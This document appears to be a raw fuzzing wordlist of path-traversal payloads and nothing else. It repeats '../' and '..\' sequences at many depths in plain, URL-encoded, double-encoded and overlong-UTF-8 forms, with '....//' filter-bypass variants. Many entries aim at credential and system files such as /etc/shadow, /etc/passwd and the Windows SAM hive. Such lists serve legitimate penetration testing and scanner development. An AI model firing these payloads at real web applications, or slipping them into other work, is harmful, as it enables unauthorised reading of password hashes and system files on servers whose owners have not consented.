../
..\/
..%2f
..%252f
..%c0%af
..%c1%9c
%2e%2e%2f
%2e%2e%5c
%252e%252e%252f
%252e%252e%255c
%c0%ae%c0%ae%c0%af
%c1%ae%c1%ae%c1%af
..%2f..%2f
..%252f..%252f
..%2f..%2f..%2f
..%252f..%252f..%252f
..%2f..%2f..%2f..%2f
..%252f..%252f..%252f..%252f
..%2f..%2f..%2f..%2f..%2f
..%252f..%252f..%252f..%252f..%252f
..%2f..%2f..%2f..%2f..%2f..%2f
..%252f..%252f..%252f..%252f..%252f..%252f
..%2f..%2f..%2f..%2f..%2f..%2f..%2f
..%252f..%252f..%252f..%252f..%252f..%252f..%252f
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f
../../
..\..\
..%2f..%2f
..%252f..%252f
../..//../
..\..\\..\
..%2f..%2f%2f..%2f
..%252f..%252f%252f..%252f
../../../
..\..\..\
..%2f..%2f..%2f
..%252f..%252f..%252f
../../../../
..\..\..\..\
..%2f..%2f..%2f..%2f
..%252f..%252f..%252f..%252f
../../../../../
..\..\..\..\..\
..%2f..%2f..%2f..%2f..%2f
..%252f..%252f..%252f..%252f..%252f
../../../../../../
..\..\..\..\..\..\
..%2f..%2f..%2f..%2f..%2f..%2f
..%252f..%252f..%252f..%252f..%252f..%252f
../../../../../../../
..\..\..\..\..\..\..\
..%2f..%2f..%2f..%2f..%2f..%2f..%2f
..%252f..%252f..%252f..%252f..%252f..%252f..%252f
../../../../../../../../
..\..\..\..\..\..\..\..\
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f
../../../../../../../../../
..\..\..\..\..\..\..\..\..\
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f
../../../../../../../../../../
..\..\..\..\..\..\..\..\..\..\
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f
../../../../../../../../../../../
..\..\..\..\..\..\..\..\..\..\..\
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f
../../../../../../../../../../../../
..\..\..\..\..\..\..\..\..\..\..\..\
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f
../../../../../../../../../../../../../
..\..\..\..\..\..\..\..\..\..\..\..\..\
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f
../../../../../../../../../../../../../../
..\..\..\..\..\..\..\..\..\..\..\..\..\..\
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f
../../../../../../../../../../../../../../../
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f
../../../../../../../../../../../../../../../../
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f
../../../../../../../../../../../../../../../../../
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f
../../../../../../../../../../../../../../../../../../
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f
../../../../../../../../../../../../../../../../../../../
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f
../../../../../../../../../../../../../../../../../../../../
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f
../etc/passwd
..\etc\passwd
..%2fetc%2fpasswd
..%252fetc%252fpasswd
../etc/hosts
..\etc\hosts
..%2fetc%2fhosts
..%252fetc%252fhosts
../etc/shadow
..\etc\shadow
..%2fetc%2fshadow
..%252fetc%252fshadow
../windows/system32/config/sam
..\windows\system32\config\sam
..%2fwindows%2fsystem32%2fconfig%2fsam
..%252fwindows%252fsystem32%252fconfig%252fsam
../windows/win.ini
..\windows\win.ini
..%2fwindows%2fwin.ini
..%252fwindows%252fwin.ini
../../etc/passwd
..\..\etc\passwd
..%2f..%2fetc%2fpasswd
..%252f..%252fetc%252fpasswd
../../../etc/passwd
..\..\..\etc\passwd
..%2f..%2f..%2fetc%2fpasswd
..%252f..%252f..%252fetc%252fpasswd
../../../../etc/passwd
..\..\..\..\etc\passwd
..%2f..%2f..%2f..%2fetc%2fpasswd
..%252f..%252f..%252f..%252fetc%252fpasswd
../../../../../etc/passwd
..\..\..\..\..\etc\passwd
..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
../../../../../../etc/passwd
..\..\..\..\..\..\etc\passwd
..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
../../../../../../../etc/passwd
..\..\..\..\..\..\..\etc\passwd
..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
../../../../../../../../etc/passwd
..\..\..\..\..\..\..\..\etc\passwd
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
../../../../../../../../../etc/passwd
..\..\..\..\..\..\..\..\..\etc\passwd
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
../../../../../../../../../../etc/passwd
..\..\..\..\..\..\..\..\..\..\etc\passwd
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
../../../../../../../../../../../etc/passwd
..\..\..\..\..\..\..\..\..\..\..\etc\passwd
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
../../../../../../../../../../../../etc/passwd
..\..\..\..\..\..\..\..\..\..\..\..\etc\passwd
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
../../../../../../../../../../../../../etc/passwd
..\..\..\..\..\..\..\..\..\..\..\..\..\etc\passwd
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
../../../../../../../../../../../../../../etc/passwd
..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc\passwd
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
../../../../../../../../../../../../../../../etc/passwd
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc\passwd
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
../../../../../../../../../../../../../../../../etc/passwd
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc\passwd
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
../../../../../../../../../../../../../../../../../etc/passwd
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc\passwd
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
../../../../../../../../../../../../../../../../../../etc/passwd
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc\passwd
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
../../../../../../../../../../../../../../../../../../../etc/passwd
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc\passwd
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
../../../../../../../../../../../../../../../../../../../../etc/passwd
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc\passwd
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
%2e%2e%2fetc%2fpasswd
%2e%2e%5cetc%5cpasswd
%252e%252e%252fetc%252fpasswd
%252e%252e%255cetc%255cpasswd
%c0%ae%c0%ae%c0%afetc%c0%afpasswd
%c1%ae%c1%ae%c1%afetc%c1%afpasswd
....//
....\\
....%2f%2f
....%5c%5c
....%252f%252f
....%255c%255c
....///
....\\\
....%2f%2f%2f
....%5c%5c%5c
....%252f%252f%252f
....%255c%255c%255c
....////
....\\\\
....%2f%2f%2f%2f
....%5c%5c%5c%5c
....%252f%252f%252f%252f
....%255c%255c%255c%255c
..../////
....\\\\\
....%2f%2f%2f%2f%2f
....%5c%5c%5c%5c%5c
....%252f%252f%252f%252f%252f
....%255c%255c%255c%255c%255c
....//////
....\\\\\\
....%2f%2f%2f%2f%2f%2f
....%5c%5c%5c%5c%5c%5c
....%252f%252f%252f%252f%252f%252f
....%255c%255c%255c%255c%255c%255c
....///////
....\\\\\\\
....%2f%2f%2f%2f%2f%2f%2f
....%5c%5c%5c%5c%5c%5c%5c
....%252f%252f%252f%252f%252f%252f%252f
....%255c%255c%255c%255c%255c%255c%255c
....////////
....\\\\\\\\
....%2f%2f%2f%2f%2f%2f%2f%2f
....%5c%5c%5c%5c%5c%5c%5c%5c
....%252f%252f%252f%252f%252f%252f%252f%252f
....%255c%255c%255c%255c%255c%255c%255c%255c
..../////////
....\\\\\\\\\
....%2f%2f%2f%2f%2f%2f%2f%2f%2f
....%5c%5c%5c%5c%5c%5c%5c%5c%5c
....%252f%252f%252f%252f%252f%252f%252f%252f%252f
....%255c%255c%255c%255c%255c%255c%255c%255c%255c
....//////////
....\\\\\\\\\\
....%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f
....%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c
....%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f
....%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c
....///////////
....\\\\\\\\\\\
....%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f
....%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c
....%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f
....%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c
....////////////
....\\\\\\\\\\\\
....%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f
....%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c
....%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f
....%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c
..../////////////
....\\\\\\\\\\\
....%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f
....%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c
....%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f
....%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c
....//////////////
....\\\\\\\\\\\\
....%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f
....%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c
....%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f
....%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c
....///////////////
....\\\\\\\\\\\\\
....%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f
....%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c
....%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f
....%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c
....////////////////
....\\\\\\\\\\\\\\\\
....%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f
....%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c
....%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f
....%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c
..../////////////////
....\\\\\\\\\\\\\\\\\
....%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f
....%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c
....%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f
....%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c
....//////////////////
....\\\\\\\\\\\\\\\\\\
....%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f
....%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c
....%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f
....%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c
....///////////////////
....\\\\\\\\\\\\\\\\\\\
....%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f
....%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c
....%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f
....%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c
....////////////////////
....\\\\\\\\\\\\\\\\\\\\
....%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f
....%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c%5c
....%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f
....%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c%255c

